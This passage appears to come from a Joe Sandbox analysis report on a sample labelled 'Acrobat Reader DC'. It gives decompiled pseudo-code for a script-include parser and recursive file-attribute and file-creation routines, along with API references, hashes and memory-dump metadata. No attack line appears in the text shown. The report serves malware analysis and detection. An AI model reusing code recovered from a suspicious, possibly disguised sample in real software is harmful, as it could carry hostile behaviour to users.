                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 2188072990-1173974218
                                  • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                  • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                  • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                  • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004033C0(void* __edx, void* __fp0, char _a1, char _a2, signed int _a3, void* _a4, WCHAR* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, char _a48, intOrPtr _a52, signed char _a68, intOrPtr _a72, char _a84, WCHAR* _a92, short _a96, short _a624, char _a1152, short _a1672, char _a2200, char _a10392, char _a10912) {
				char _v0;
				char _v19;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t146;
				signed int _t147;
				void* _t151;
				signed char _t180;
				char _t182;
				intOrPtr _t183;
				void* _t191;
				void* _t197;
				signed int _t198;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t207;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				char* _t215;
				intOrPtr* _t216;
				signed int _t225;
				intOrPtr _t226;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t282;
				intOrPtr* _t284;
				signed int _t285;
				signed int _t286;
				void* _t288;
				void* _t290;
				void* _t291;

				_t322 = __fp0;
				_t286 = _t285 & 0xfffffff8;
				E00422240(0x2cac);
				_t146 =  *0x4a9538; // 0x0
				_t147 = _t146 + 1;
				 *0x4a9538 = _t147;
				_t294 = _t147 - 0x30;
				if(_t147 >= 0x30) {
					E00454014(__eflags, __fp0, _a4, _a16, _a24, L"#include depth exceeded.  Make sure there are no recursive includes", _a20);
					 *0x4a9538 =  *0x4a9538 - 1;
					_t151 = 0;
					L42:
					return _t151;
				}
				_t270 = _a8;
				_t225 = 1;
				_a4 = 0;
				_a1 = 1;
				_a3 = 1;
				_a2 = 0;
				E0040DA60( &_a24, _t294);
				E00401B10(_t270,  &_a8, _t294);
				if(E0040DE40(0x2000,  &_a24, _t270,  &_a8) == 0) {
					_v0 = 1;
				} else {
					_v0 = 0;
				}
				E00402250( &_a8);
				if(_v0 != 0) {
					E00454014(__eflags, _t322, _a4, _a16, _a24, L"Error opening the file", _a20);
					E00443FDF( &_a4);
					 *0x4a9538 =  *0x4a9538 - 1;
					_t151 = 0;
					goto L42;
				} else {
					GetCurrentDirectoryW(0x104,  &_a1672);
					GetFullPathNameW(_t270, 0x104,  &_a96,  &_a92);
					E00413A0E( &_a96,  &_a84,  &_a1152,  &_a10912,  &_a10392);
					E00411567( &_a624,  &_a84);
					E00411536( &_a624,  &_a1152);
					_t288 = _t286 + 0x24;
					_t237 =  &_a624;
					SetCurrentDirectoryW( &_a624);
					while(_t225 == 1) {
						_a2200 = 0;
						E00403350( &_a48);
						_t180 = _a68;
						if((_t180 & 0x00000003) != 0) {
							_t182 = E0045F6BB(_t237, __eflags, _t322,  &_a24,  &_a48);
							_t226 = 0;
						} else {
							_t299 = _t180 & 0x00000004;
							if((_t180 & 0x00000004) != 0) {
								_t182 = E00468961( &_a24, __eflags, _t322,  &_a24,  &_a48);
								_t226 = 0;
							} else {
								_t226 = 0;
								_push(0x10);
								_a12 = 0;
								_a16 = 0x10;
								_t215 = E004115D7(_t270,  &_a48, _t299);
								_push(4);
								_a8 = _t215;
								 *_t215 = 0;
								_t216 = E004115D7(_t270,  &_a48, _t299);
								_t288 = _t288 + 8;
								if(_t216 == 0) {
									_a20 = 0;
								} else {
									 *_t216 = 1;
									_a20 = _t216;
								}
								if(E004037A0( &_a24,  &_a8, _t322) == 0) {
									E00401350( &_a8);
									_t182 = 0;
								} else {
									E00403AF0(_t226,  &_a8,  &_a48);
									_t284 = _a12;
									 *_t284 =  *_t284 - 1;
									if( *_t284 == 0) {
										_t237 = _a8;
										_push(_a8);
										E004111DC();
										_push(_t284);
										E004111DC();
										_t288 = _t288 + 8;
									}
									_t182 = 1;
								}
							}
						}
						if(_t182 == 0) {
							L41:
							E0040DA20( &_a24);
							_a68 = _t226;
							_a72 = _t226;
							SetCurrentDirectoryW( &_a1672);
							E0040DA20( &_a24);
							_a68 = _t226;
							_a72 = _t226;
							E00402250( &_a48);
							E0040DA20( &_a24);
							_push(_a28);
							E004111DC();
							_t151 = _a1;
							 *0x4a9538 =  *0x4a9538 - 1;
							__eflags =  *0x4a9538;
							goto L42;
						} else {
							_t183 = _a52;
							if(_t183 > 0xffe) {
								_t277 = _t183 - 0xffe;
								E004026F0( &_a48);
								E00410E60(_a48 + 0x1ffc, _a48 + 0x1ffc + _t277 * 2, _a52 - _t277 + _a52 - _t277 - 0x1ffa);
								_t288 = _t288 + 0xc;
								_a52 = _a52 - _t277;
							}
							E00411567( &_a2200, _a48);
							_a4 = _a4 + 1;
							_t290 = _t288 + 8;
							_t278 = 0;
							_t270 = 0;
							while(1) {
								_t227 =  *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff;
								_t191 = E0041324E( *(_t290 + 0x8a8 + _t278 * 2) & 0x0000ffff);
								_t288 = _t290 + 4;
								if(_t191 == 0) {
									break;
								}
								_t213 = E00413225(_t237, _t227);
								_t290 = _t288 + 4;
								if(_t213 != 0) {
									_t278 = _t278 + 1;
									continue;
								}
								break;
							}
							if( *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2)) == _t270) {
								L21:
								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) = 0;
								if(E004039A0( &_a2200) == 0) {
									E00454014(__eflags, _t322, _a4, _a16, _a4, L"Unterminated string",  &_a2200);
									_v19 = 0;
									break;
								}
								_t197 = E004111C1( &_a2200);
								_t291 = _t288 + 4;
								if(_t197 == 0) {
									L28:
									_v0 = 0;
									_t198 = E004111C1( &_a2200);
									_t288 = _t291 + 4;
									if(_t198 > 2) {
										_t280 = _t198;
										_t210 = E00413225( *(_t288 + 0x8a4 + _t280 * 2) & 0x7f,  *(_t288 + 0x8a4 + _t280 * 2) & 0x7f);
										_t288 = _t288 + 4;
										if(_t210 != 0) {
											__eflags =  *((short*)(_t288 + 0x8a6 + _t280 * 2)) - 0x5f;
											if( *((short*)(_t288 + 0x8a6 + _t280 * 2)) == 0x5f) {
												 *((short*)(_t288 + 0x8a6 + _t280 * 2)) = 0;
												_v0 = 1;
											}
										}
									}
									if(_a2 == 1) {
										_t237 = _a4;
										E00434963(_a4,  &_a2200);
									} else {
										_t279 = _a4;
										_t237 = _a4;
										_t202 = E00403A20(_a4,  &_a2200, _t322,  &_a2200,  &_a96,  &_a4,  &_a24);
										if(_t202 != 3) {
											_t203 = _t202;
											__eflags = _t203;
											if(_t203 == 0) {
												_a1 = 0;
												L33:
												if(_v0 == 1) {
													_a2 = 1;
												} else {
													_a2 = 0;
												}
												if(_a1 != 1) {
													break;
												} else {
													_t225 = _a3;
													continue;
												}
											}
											_t204 = _t203 - 2;
											__eflags = _t204;
											if(_t204 == 0) {
												goto L32;
											}
											_t207 = _t204 - 2;
											__eflags = _t207;
											if(_t207 == 0) {
												_a3 = _t207;
											}
											goto L33;
										}
										L32:
										_t237 = _a4;
										E00403A50( &_a2200, _a4, _t279, _a4, _a12);
									}
									goto L33;
								}
								_t66 = _t197 - 1; // -1
								_t282 = _t66;
								if(_t282 < 0) {
									L27:
									 *((short*)(_t291 + 0x8aa + _t282 * 2)) = 0;
									goto L28;
								}
								while(1) {
									_t270 =  *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff;
									_t211 = E0041324E( *(_t291 + 0x8a8 + _t282 * 2) & 0x0000ffff);
									_t291 = _t291 + 4;
									if(_t211 == 0) {
										goto L27;
									}
									_t212 = E00413225(_t237, _t270);
									_t291 = _t291 + 4;
									if(_t212 != 0) {
										_t282 = _t282 - 1;
										__eflags = _t282;
										if(_t282 >= 0) {
											continue;
										}
									}
									goto L27;
								}
								goto L27;
							} else {
								goto L20;
							}
							do {
								L20:
								_t237 =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
								 *((short*)(_t288 + 0x8a8 + _t270 * 2)) =  *((intOrPtr*)(_t288 + 0x8a8 + _t278 * 2));
								_t278 = _t278 + 1;
								_t270 =  &(_t270[0]);
							} while ( *((short*)(_t288 + 0x8a8 + _t278 * 2)) != 0);
							goto L21;
						}
					}
					_t226 = 0;
					goto L41;
				}
			}







































                                  0x004033c0
                                  0x004033c3
                                  0x004033cb
                                  0x004033d0
                                  0x004033d6
                                  0x004033d9
                                  0x004033de
                                  0x004033e1
                                  0x00428208
                                  0x0042820d
                                  0x00428213
                                  0x0040378d
                                  0x00403793
                                  0x00403793
                                  0x004033e7
                                  0x004033ea
                                  0x004033f0
                                  0x004033f8
                                  0x004033fd
                                  0x00403401
                                  0x00403406
                                  0x0040340f
                                  0x00403425
                                  0x0042821a
                                  0x0040342b
                                  0x0040342b
                                  0x0040342b
                                  0x00403434
                                  0x0040343e
                                  0x00428239
                                  0x00428243
                                  0x00428248
                                  0x0042824e
                                  0x00000000
                                  0x00403444
                                  0x00403451
                                  0x00403467
                                  0x00403492
                                  0x004034a7
                                  0x004034bc
                                  0x004034c1
                                  0x004034c4
                                  0x004034cc
                                  0x004034d2
                                  0x004034e1
                                  0x004034e9
                                  0x004034ee
                                  0x004034f4
                                  0x0042827e
                                  0x00428283
                                  0x004034fa
                                  0x004034fa
                                  0x004034fc
                                  0x0042825f
                                  0x00428264
                                  0x00403502
                                  0x00403502
                                  0x00403504
                                  0x00403506
                                  0x0040350a
                                  0x00403512
                                  0x0040351a
                                  0x0040351c
                                  0x00403520
                                  0x00403522
                                  0x00403527
                                  0x0040352c
                                  0x0042826b
                                  0x00403532
                                  0x00403532
                                  0x00403538
                                  0x00403538
                                  0x0040354b
                                  0x00403730
                                  0x00403735
                                  0x00403551
                                  0x00403557
                                  0x0040355c
                                  0x00403560
                                  0x00403562
                                  0x00403564
                                  0x00403568
                                  0x00403569
                                  0x00403571
                                  0x00403572
                                  0x00403577
                                  0x00403577
                                  0x0040357a
                                  0x0040357a
                                  0x0040354b
                                  0x004034fc
                                  0x0040357e
                                  0x0040373c
                                  0x00403740
                                  0x0040374d
                                  0x00403751
                                  0x00403755
                                  0x0040375b
                                  0x00403764
                                  0x00403768
                                  0x0040376c
                                  0x00403771
                                  0x0040377a
                                  0x0040377b
                                  0x00403780
                                  0x00403787
                                  0x00403787
                                  0x00000000
                                  0x00403584
                                  0x00403584
                                  0x0040358d
                                  0x0042828a
                                  0x00428294
                                  0x004282b9
                                  0x004282be
                                  0x004282c1
                                  0x004282c1
                                  0x004035a0
                                  0x004035a5
                                  0x004035a9
                                  0x004035ac
                                  0x004035ae
                                  0x004035b0
                                  0x004035b0
                                  0x004035b9
                                  0x004035be
                                  0x004035c3
                                  0x00000000
                                  0x00000000
                                  0x004035c6
                                  0x004035cb
                                  0x004035d0
                                  0x00403716
                                  0x00000000
                                  0x00403716
                                  0x00000000
                                  0x004035d0
                                  0x004035de
                                  0x004035fd
                                  0x00403606
                                  0x00403615
                                  0x00428350
                                  0x00428355
                                  0x00000000
                                  0x00428355
                                  0x00403623
                                  0x00403628
                                  0x0040362d
                                  0x00403670
                                  0x00403678
                                  0x0040367d
                                  0x00403682
                                  0x00403688
                                  0x0040368a
                                  0x0040369c
                                  0x004036a1
                                  0x004036a6
                                  0x0040371c
                                  0x00403725
                                  0x004282df
                                  0x004282e2
                                  0x004282e2
                                  0x00403725
                                  0x004036a6
                                  0x004036ad
                                  0x004282ec
                                  0x004282f8
                                  0x004036b3
                                  0x004036b3
                                  0x004036cd
                                  0x004036cf
                                  0x004036d7
                                  0x00428302
                                  0x00428302
                                  0x00428305
                                  0x00428322
                                  0x004036f2
                                  0x004036f7
                                  0x0042832c
                                  0x004036fd
                                  0x004036fd
                                  0x004036fd
                                  0x00403707
                                  0x00000000
                                  0x0040370d
                                  0x0040370d
                                  0x00000000
                                  0x0040370d
                                  0x00403707
                                  0x00428307
                                  0x00428307
                                  0x0042830a
                                  0x00000000
                                  0x00000000
                                  0x00428310
                                  0x00428310
                                  0x00428313
                                  0x00428319
                                  0x00428319
                                  0x00000000
                                  0x00428313
                                  0x004036dd
                                  0x004036e0
                                  0x004036ed
                                  0x004036ed
                                  0x00000000
                                  0x004036ad
                                  0x0040362f
                                  0x0040362f
                                  0x00403634
                                  0x00403666
                                  0x00403668
                                  0x00000000
                                  0x00403668
                                  0x00403640
                                  0x00403640
                                  0x00403649
                                  0x0040364e
                                  0x00403653
                                  0x00000000
                                  0x00000000
                                  0x00403656
                                  0x0040365b
                                  0x00403660
                                  0x004282ca
                                  0x004282ca
                                  0x004282cb
                                  0x00000000
                                  0x00000000
                                  0x004282d1
                                  0x00000000
                                  0x00403660
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004035e0
                                  0x004035e0
                                  0x004035e0
                                  0x004035e8
                                  0x004035f0
                                  0x004035f1
                                  0x004035f2
                                  0x00000000
                                  0x004035e0
                                  0x0040357e
                                  0x0042835a
                                  0x00000000
                                  0x0042835a

                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                  • __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                  • _wcscpy.LIBCMT ref: 004034A7
                                  • _wcscat.LIBCMT ref: 004034BC
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                  • _wcscpy.LIBCMT ref: 004035A0
                                  • _wcslen.LIBCMT ref: 00403623
                                  • _wcslen.LIBCMT ref: 0040367D
                                  Strings
                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                  • Unterminated string, xrefs: 00428348
                                  • _, xrefs: 0040371C
                                  • Error opening the file, xrefs: 00428231
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                  • API String ID: 3393021363-188983378
                                  • Opcode ID: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                  • Opcode Fuzzy Hash: 9c138f860f86a0d4610993aab54d097ae5008560e405b0aba632f65b2ab93e4d
                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00431A86(intOrPtr __ecx, WCHAR* _a4, signed int _a8, signed int _a12, char _a16) {
				struct _WIN32_FIND_DATAW _v596;
				intOrPtr _v600;
				void* _t33;
				void* _t34;
				void* _t43;
				void* _t46;
				void* _t55;
				void* _t77;
				void* _t83;
				signed int _t89;
				void* _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x254;
				_v600 = __ecx;
				_t55 = 0;
				_t83 = FindFirstFileW(_a4,  &_v596);
				if(_t83 == 0xffffffff) {
					L7:
					FindClose(_t83);
					if(_a16 != 0) {
						_t77 = FindFirstFileW("*.*",  &_v596);
						if(_t77 == 0xffffffff) {
							L18:
							FindClose(_t77);
							return 1;
						} else {
							do {
								if((_v596.dwFileAttributes & 0x00000010) == 0) {
									goto L17;
								} else {
									_t33 = E0041313C( &(_v596.cFileName), ".");
									_t91 = _t91 + 8;
									if(_t33 == 0) {
										goto L17;
									} else {
										_t34 = E0041313C( &(_v596.cFileName), 0x48ab30);
										_t91 = _t91 + 8;
										if(_t34 == 0) {
											goto L17;
										} else {
											SetCurrentDirectoryW( &(_v596.cFileName));
											if(E00431A86(_v600, _a4, _a8, _a12, _a16) == 0) {
												FindClose(_t77);
												return 0;
											} else {
												SetCurrentDirectoryW(0x48ab30);
												goto L17;
											}
										}
									}
								}
								goto L20;
								L17:
							} while (FindNextFileW(_t77,  &_v596) != 0);
							goto L18;
						}
					} else {
						return _t55;
					}
				} else {
					do {
						_t43 = E0041313C( &(_v596.cFileName), ".");
						_t91 = _t91 + 8;
						if(_t43 == 0) {
							goto L6;
						} else {
							_t46 = E0041313C( &(_v596.cFileName), 0x48ab30);
							_t91 = _t91 + 8;
							if(_t46 == 0) {
								goto L6;
							} else {
								if(SetFileAttributesW( &(_v596.cFileName), (GetFileAttributesW( &(_v596.cFileName)) | _a8) &  !_a12) == 0) {
									FindClose(_t83);
									return 0;
								} else {
									_t55 = 1;
									goto L6;
								}
							}
						}
						goto L20;
						L6:
					} while (FindNextFileW(_t83,  &_v596) != 0);
					goto L7;
				}
				L20:
			}














                                  0x00431a8c
                                  0x00431a9f
                                  0x00431aa8
                                  0x00431aac
                                  0x00431ab1
                                  0x00431b19
                                  0x00431b20
                                  0x00431b26
                                  0x00431b51
                                  0x00431b56
                                  0x00431bcc
                                  0x00431bcd
                                  0x00431bd7
                                  0x00431b58
                                  0x00431b5e
                                  0x00431b63
                                  0x00000000
                                  0x00431b65
                                  0x00431b6f
                                  0x00431b74
                                  0x00431b79
                                  0x00000000
                                  0x00431b7b
                                  0x00431b85
                                  0x00431b8a
                                  0x00431b8f
                                  0x00000000
                                  0x00431b91
                                  0x00431b96
                                  0x00431bb3
                                  0x00431bdb
                                  0x00431be5
                                  0x00431bb5
                                  0x00431bba
                                  0x00000000
                                  0x00431bba
                                  0x00431bb3
                                  0x00431b8f
                                  0x00431b79
                                  0x00000000
                                  0x00431bbc
                                  0x00431bc8
                                  0x00000000
                                  0x00431b5e
                                  0x00431b28
                                  0x00431b30
                                  0x00431b30
                                  0x00431ab6
                                  0x00431ab6
                                  0x00431ac0
                                  0x00431ac5
                                  0x00431aca
                                  0x00000000
                                  0x00431acc
                                  0x00431ad6
                                  0x00431adb
                                  0x00431ae0
                                  0x00000000
                                  0x00431ae2
                                  0x00431b05
                                  0x00431b34
                                  0x00431b42
                                  0x00431b07
                                  0x00431b07
                                  0x00000000
                                  0x00431b07
                                  0x00431b05
                                  0x00431ae0
                                  0x00000000
                                  0x00431b09
                                  0x00431b15
                                  0x00000000
                                  0x00431ab6
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                  • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                  • FindClose.KERNEL32(00000000), ref: 00431B20
                                  • FindClose.KERNEL32(00000000), ref: 00431B34
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                  • FindClose.KERNEL32(00000000), ref: 00431BCD
                                  • FindClose.KERNEL32(00000000), ref: 00431BDB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                  • String ID: *.*
                                  • API String ID: 1409584000-438819550
                                  • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                  • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                  • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00442886(intOrPtr __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				intOrPtr _v8;
				struct _WIN32_FIND_DATAW _v604;
				void* _t32;
				void* _t33;
				void* _t42;
				void* _t45;
				void* _t47;
				void* _t50;
				void* _t66;
				void* _t67;
				void* _t69;

				_v8 = __ecx;
				_t50 = 0;
				_t67 = FindFirstFileW(_a4,  &_v604);
				if(_t67 == 0xffffffff) {
					L7:
					FindClose(_t67);
					if(_a16 != 0) {
						_t66 = FindFirstFileW("*.*",  &_v604);
						if(_t66 == 0xffffffff) {
							L18:
							FindClose(_t66);
							return 1;
						} else {
							do {
								if((_v604.dwFileAttributes & 0x00000010) == 0) {
									goto L17;
								} else {
									_t32 = E0041313C( &(_v604.cFileName), ".");
									_t69 = _t69 + 8;
									if(_t32 == 0) {
										goto L17;
									} else {
										_t33 = E0041313C( &(_v604.cFileName), 0x48ab30);
										_t69 = _t69 + 8;
										if(_t33 == 0) {
											goto L17;
										} else {
											SetCurrentDirectoryW( &(_v604.cFileName));
											if(E00442886(_v8, _a4, _a8, _a12, _a16) == 0) {
												FindClose(_t66);
												return 0;
											} else {
												SetCurrentDirectoryW(0x48ab30);
												goto L17;
											}
										}
									}
								}
								goto L20;
								L17:
							} while (FindNextFileW(_t66,  &_v604) != 0);
							goto L18;
						}
					} else {
						return _t50;
					}
				} else {
					do {
						_t42 = E0041313C( &(_v604.cFileName), ".");
						_t69 = _t69 + 8;
						if(_t42 == 0) {
							goto L6;
						} else {
							_t45 = E0041313C( &(_v604.cFileName), 0x48ab30);
							_t69 = _t69 + 8;
							if(_t45 == 0) {
								goto L6;
							} else {
								_t47 = E00433C08( &(_v604.cFileName), _a8, _a12);
								_t69 = _t69 + 0xc;
								if(_t47 == 0) {
									FindClose(_t67);
									return 0;
								} else {
									_t50 = 1;
									goto L6;
								}
							}
						}
						goto L20;
						L6:
					} while (FindNextFileW(_t67,  &_v604) != 0);
					goto L7;
				}
				L20:
			}














                                  0x0044289e
                                  0x004428a6
                                  0x004428aa
                                  0x004428af
                                  0x00442915
                                  0x0044291c
                                  0x00442922
                                  0x0044294f
                                  0x00442954
                                  0x004429d3
                                  0x004429d4
                                  0x004429de
                                  0x00442956
                                  0x0044295c
                                  0x00442963
                                  0x00000000
                                  0x00442965
                                  0x00442971
                                  0x00442976
                                  0x0044297b
                                  0x00000000
                                  0x0044297d
                                  0x00442989
                                  0x0044298e
                                  0x00442993
                                  0x00000000
                                  0x00442995
                                  0x0044299c
                                  0x004429b8
                                  0x004429e2
                                  0x004429ec
                                  0x004429ba
                                  0x004429bf
                                  0x00000000
                                  0x004429bf
                                  0x004429b8
                                  0x00442993
                                  0x0044297b
                                  0x00000000
                                  0x004429c1
                                  0x004429cf
                                  0x00000000
                                  0x0044295c
                                  0x00442924
                                  0x0044292c
                                  0x0044292c
                                  0x004428b1
                                  0x004428b6
                                  0x004428c2
                                  0x004428c7
                                  0x004428cc
                                  0x00000000
                                  0x004428ce
                                  0x004428da
                                  0x004428df
                                  0x004428e4
                                  0x00000000
                                  0x004428e6
                                  0x004428f5
                                  0x004428fa
                                  0x004428ff
                                  0x00442930
                                  0x0044293e
                                  0x00442901
                                  0x00442901
                                  0x00000000
                                  0x00442901
                                  0x004428ff
                                  0x004428e4
                                  0x00000000
                                  0x00442903
                                  0x00442911
                                  0x00000000
                                  0x004428b6
                                  0x00000000

                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                  • FindClose.KERNEL32(00000000), ref: 0044291C
                                  • FindClose.KERNEL32(00000000), ref: 00442930
                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                  • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                  • FindClose.KERNEL32(00000000), ref: 004429D4
                                    • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                  • FindClose.KERNEL32(00000000), ref: 004429E2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                  • String ID: *.*
                                  • API String ID: 2640511053-438819550
                                  • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
